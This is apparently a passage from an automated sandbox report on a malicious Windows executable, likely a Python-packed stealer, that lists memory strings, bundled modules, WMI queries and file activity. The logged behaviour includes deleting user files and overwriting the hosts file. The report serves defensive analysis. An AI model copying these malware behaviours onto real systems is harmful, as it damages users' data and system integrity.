              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: KpHYfxnJs6.exe, 00000004.00000003.2620928135.0000000007A67000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617501085.0000000007A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617408456.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007672000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621368120.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: KpHYfxnJs6.exe, 00000004.00000003.2651924922.0000000007A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: KpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2897045196.000000006BF0F000.00000004.00000001.01000000.00000012.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2897932299.000000006C159000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: KpHYfxnJs6.exe, 00000004.00000003.2461660455.0000000004E53000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461744604.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2461580461.0000000004E47000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2885247505.0000000007240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C67B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484185809.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KATAXZVCPS.png
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\XZXHAVGRAG.docx
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\LTKMYBSEYZ.xlsx
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KZWFNRXYKI.mp3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File deleted: C:\Users\user\AppData\Local\Temp\ ? \Common Files\Desktop\KZWFNRXYKI.pdf
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: cmd.exe Process created: 79

              System Summary

              Source: KpHYfxnJs6.exe Static PE information: section name:
              Source: KpHYfxnJs6.exe Static PE information: section name:
              Source: KpHYfxnJs6.exe Static PE information: section name:
              Source: KpHYfxnJs6.exe Static PE information: section name:
              Source: KpHYfxnJs6.exe Static PE information: section name:
              Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\SysWOW64\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA43A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA6B57C: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767837F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_076781F7
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767AF63
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_0767837F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Code function: 4_3_076781F7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_04E2B560
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_04E2B551
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_08EB3A08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 70_2_041E7070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 70_2_041E7080
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 70_2_07E11967
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 70_2_07E11968
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA30A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA57B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA354C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA31180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA282F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA21884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA38C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA64B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA79B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA50D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA76D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA49D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA65C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA249B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA669FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA8AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA65A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA64FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA8DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA33030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA55F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA8AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA800F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA40104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA50074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA58040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA71DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA31E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA69D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA29EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA38E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA7FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA6AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA6EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA50374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA32360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA65468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA681CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA841CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA3E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA62164
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA242E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA3D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA7832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA71314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA72268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA2F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA47244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA602A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA467E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA317C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA538E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA6190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA50904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA718A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA32890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA28884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA7260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA565FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA4F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA38598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA886D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA386C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA5A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA60710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA62700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: 109_2_00007FF6FAA77660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: String function: 00007FF6FAA649F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe Code function: String function: 00007FF6FAA38444 appears 48 times
              Source: rar.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: KpHYfxnJs6.exe Binary or memory string: OriginalFilename vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000000.1669173285.000000000043F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.1672821995.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000002.2910567037.000000000043B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048117788.00000000050F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902511087.000000006F875000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2900967106.000000006F81F000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2904354271.000000006F8E6000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2882901665.000000000043B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2900318548.000000006F80B000.00000004.00000001.01000000.00000014.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000003.2056060266.0000000000190000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000000.2052256038.000000000043F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2896645946.000000006BE78000.00000004.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898540098.000000006C2B4000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2905154634.000000006F90E000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2897045196.000000006BF0F000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamelibsslH vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2901575971.000000006F847000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902814249.000000006F89A000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2903320581.000000006F8B7000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2902098945.000000006F85B000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2899938912.000000006C7BD000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2905634194.000000006F922000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs KpHYfxnJs6.exe
              Source: KpHYfxnJs6.exe, 00000004.00000002.2897932299.000000006C159000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs KpHYfxnJs6.exe
